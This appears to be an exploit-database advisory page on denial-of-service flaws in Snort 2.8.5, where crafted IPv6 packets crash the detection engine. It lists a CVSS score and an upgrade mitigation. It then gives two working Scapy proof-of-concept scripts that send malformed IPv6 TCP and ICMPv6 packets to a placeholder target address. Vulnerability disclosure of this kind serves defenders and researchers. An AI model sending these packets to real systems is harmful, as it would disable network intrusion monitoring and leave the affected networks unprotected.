Snort Multiple Denial-of-Service Vulnerabilities

vendor:

Snort

by:

SecurityFocus

7.8

CVSS

HIGH

Denial-of-Service

N/A

CWE

Product Name: Snort

Affected Version From: 2.8.2005

Affected Version To: 2.8.2005

Patch Exists: Yes

Related CWE: N/A

CPE: N/A

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: x86, x64

2009

Snort Multiple Denial-of-Service Vulnerabilities

Snort is prone to multiple denial-of-service vulnerabilities because the application fails to properly process specially crafted IPv6 packets. Attackers can exploit these issues to crash the affected application, causing denial-of-service conditions. These issues affect Snort 2.8.5; other versions may also be vulnerable. You can reproduce theses two differents bugs easily by using the Python low-level networking lib Scapy (http://www.secdev.org/projects/scapy/files/scapy-latest.zip)

Mitigation:

Upgrade to the latest version of Snort

Source

Exploit-DB raw data:

source: https://www.securityfocus.com/bid/36795/info

Snort is prone to multiple denial-of-service vulnerabilities because the application fails to properly process specially crafted IPv6 packets.

Attackers can exploit these issues to crash the affected application, causing denial-of-service conditions.

These issues affect Snort 2.8.5; other versions may also be vulnerable.

You can reproduce theses two differents bugs easily by using the Python low-level networking lib Scapy
(http://www.secdev.org/projects/scapy/files/scapy-latest.zip)

1) #only works on x86

#/usr/bin/env python
from scapy.all import *
u = "\x92"+"\x02" * 6
send(IPv6(dst="IPv6_addr_here", nh=6)/u) #nh6 -> TCP

2) # works x86,x64

#/usr/bin/env python
from scapy.all import *

z = "Q" * 30
send(IPv6(dst="IPv6_ADDR_HERE",nh=1)/ICMPv6NIQueryNOOP(type=4)/z) #nh1 -> icmp (not v6)